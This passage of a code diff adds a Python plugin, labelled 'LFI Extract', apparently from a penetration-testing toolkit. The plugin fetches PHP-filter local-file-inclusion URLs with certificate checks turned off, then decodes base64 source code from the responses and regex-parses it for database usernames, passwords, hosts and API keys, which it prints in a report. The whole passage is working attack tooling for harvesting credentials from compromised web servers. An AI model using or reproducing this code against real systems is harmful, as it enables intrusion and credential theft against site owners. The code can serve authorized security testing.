+ "credentials": [],
331
+ "sources_processed": 0,
332
+ "sources_failed": 0,
333
+ "decoded_files": [],
334
+ "errors": [],
335
+ }
336
+
337
+ if not urls:
338
+ result["errors"].append("No PHP filter URLs provided")
339
+ return result
340
+
341
+ for url in urls:
342
+ try:
343
+ resp = requests.get(url, timeout=timeout, verify=False) # nosec B501
344
+
345
+ if resp.status_code != 200:
346
+ result["sources_failed"] += 1
347
+ result["errors"].append(f"HTTP {resp.status_code}: {url[:80]}")
348
+ continue
349
+
350
+ # Extract base64 from response
351
+ html = resp.text
352
+ base64_pattern = r"([A-Za-z0-9+/]{50,}={0,2})"
353
+ matches = re.findall(base64_pattern, html)
354
+
355
+ if not matches:
356
+ result["sources_failed"] += 1
357
+ result["errors"].append(f"No base64 found: {url[:80]}")
358
+ continue
359
+
360
+ for b64_match in matches:
361
+ try:
362
+ decoded = base64.b64decode(b64_match).decode(
363
+ "utf-8", errors="ignore"
364
+ )
365
+
366
+ # Skip if it doesn't look like code
367
+ if (
368
+ "<?php" not in decoded
369
+ and "$" not in decoded
370
+ and "=" not in decoded
371
+ ):
372
+ continue
373
+
374
+ # Extract source file name from URL
375
+ source_file = self._extract_source_file(url)
376
+ result["decoded_files"].append(source_file)
377
+ result["sources_processed"] += 1
378
+
379
+ # Extract credentials
380
+ creds = self._parse_credentials(decoded, url, source_file)
381
+ if creds:
382
+ result["credentials"].extend(creds)
383
+
384
+ break # Found valid content, move to next URL
385
+
386
+ except Exception:
387
+ continue
388
+
389
+ except requests.RequestException as e:
390
+ result["sources_failed"] += 1
391
+ result["errors"].append(f"Request failed: {str(e)[:50]}")
392
+ except Exception as e:
393
+ result["sources_failed"] += 1
394
+ result["errors"].append(f"Error: {str(e)[:50]}")
395
+
396
+ return result
397
+
398
+ def _extract_source_file(self, url: str) -> str:
399
+ """Extract the source file name from a PHP filter URL."""
400
+ # Look for resource= parameter
401
+ match = re.search(r"resource=([^&\s]+)", url)
402
+ if match:
403
+ resource = match.group(1)
404
+ # Clean up the resource path
405
+ if "/" in resource:
406
+ return resource.split("/")[-1]
407
+ return resource
408
+ return "unknown"
409
+
410
+ def _parse_credentials(
411
+ self, content: str, source_url: str, source_file: str
412
+ ) -> List[Dict[str, Any]]:
413
+ """Parse decoded content for credentials."""
414
+ credentials = []
415
+ found = {"username": None, "password": None, "database": None, "host": None}
416
+
417
+ for pattern, field in CREDENTIAL_PATTERNS:
418
+ if field == "connection_string":
419
+ # Handle connection strings specially
420
+ match = re.search(pattern, content, re.IGNORECASE)
421
+ if match:
422
+ groups = match.groups()
423
+ if len(groups) >= 4:
424
+ found["username"] = groups[0]
425
+ found["password"] = groups[1]
426
+ found["host"] = groups[2]
427
+ found["database"] = groups[3]
428
+ else:
429
+ match = re.search(pattern, content, re.IGNORECASE)
430
+ if match:
431
+ value = match.group(1)
432
+ # Don't overwrite with empty or placeholder values
433
+ if value and value not in (
434
+ "",
435
+ "root",
436
+ "localhost",
437
+ "127.0.0.1",
438
+ "password",
439
+ "changeme",
440
+ ):
441
+ if not found.get(field):
442
+ found[field] = value
443
+ elif not found.get(field):
444
+ # Accept default values like 'root' if nothing else found
445
+ found[field] = value
446
+
447
+ # If we found at least username and password, create credential entry
448
+ if found.get("username") and found.get("password"):
449
+ credentials.append(
450
+ {
451
+ "username": found["username"],
452
+ "password": found["password"],
453
+ "database": found.get("database"),
454
+ "host": found.get("host", "localhost"),
455
+ "source_url": source_url,
456
+ "source_file": source_file,
457
+ "credential_type": "database",
458
+ }
459
+ )
460
+
461
+ # Also look for API keys as separate credentials
462
+ for pattern, field in CREDENTIAL_PATTERNS:
463
+ if field in ("api_key", "secret_key"):
464
+ for match in re.finditer(pattern, content, re.IGNORECASE):
465
+ key_value = match.group(1)
466
+ if len(key_value) >= 20: # API keys are usually long
467
+ credentials.append(
468
+ {
469
+ "api_key": key_value,
470
+ "source_url": source_url,
471
+ "source_file": source_file,
472
+ "credential_type": field,
473
+ }
474
+ )
475
+
476
+ return credentials
477
+
478
+ def _format_output(
479
+ self, target: str, result: Dict[str, Any], label: str, urls: List[str]
480
+ ) -> str:
481
+ """Format extraction results for log output."""
482
+ lines = []
483
+ lines.append("=" * 70)
484
+ lines.append("=== Plugin: LFI Extract (SoulEyez Built-in) ===")
485
+ lines.append("=" * 70)
486
+ lines.append(f"Target: {target}")
487
+ if label:
488
+ lines.append(f"Label: {label}")
489
+ lines.append(
490
+ f"Started: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())}"
491
+ )
492
+ lines.append("")
493
+ lines.append(f"URLs processed: {result['sources_processed']}")
494
+ lines.append(f"URLs failed: {result['sources_failed']}")
495
+ lines.append(f"Files decoded: {', '.join(result['decoded_files']) or 'None'}")
496
+ lines.append("")
497
+
498
+ if result.get("credentials"):
499
+ lines.append("=" * 70)
500
+ lines.append("CREDENTIALS EXTRACTED")
501
+ lines.append("=" * 70)
502
+ lines.append("")
503
+
504
+ for i, cred in enumerate(result["credentials"], 1):
505
+ if cred.get("credential_type") == "database":
506
+ lines.append(f"[{i}] DATABASE CREDENTIALS")
507
+ lines.append(f" Username: {cred.get('username')}")
508
+ lines.append(f" Password: {cred.get('password')}")
509
+ lines.append(f" Database: {cred.get('database', 'unknown')}")
510
+ lines.append(f" Host: {cred.get('host', 'localhost')}")
511
+ lines.append(f" Source: {cred.get('source_file')}")
512
+ elif cred.get("credential_type") in ("api_key", "secret_key"):
513
+ lines.append(
514
+ f"[{i}] {cred.get('credential_type', 'API KEY').upper()}"
515
+ )
516
+ key = cred.get("api_key", "")
517
+ lines.append(
518
+ f" Key: {key[:20]}...{key[-10:] if len(key) > 30 else key}"
519
+ )
520
+ lines.append(f" Source: {cred.get('source_file')}")
521
+ lines.append("")
522
+
523
+ else:
524
+ lines.append("No credentials found in decoded files.")
525
+ lines.append("")
526
+
527
+ if result.get("errors"):
528
+ lines.append("-" * 40)
529
+ lines.append("Errors encountered:")
530
+ for err in result["errors"][:10]:
531
+ lines.append(f" - {err}")
532
+ lines.append("")
533
+
534
+ lines.append(
535
+ f"\n=== Completed: {time.strftime('%Y-%m-%d %H:%M:%S UTC', time.gmtime())} ==="
536
+ )
537
+
538
+ return "\n".join(lines)
539
+
540
+
541
+ plugin = LfiExtractPlugin()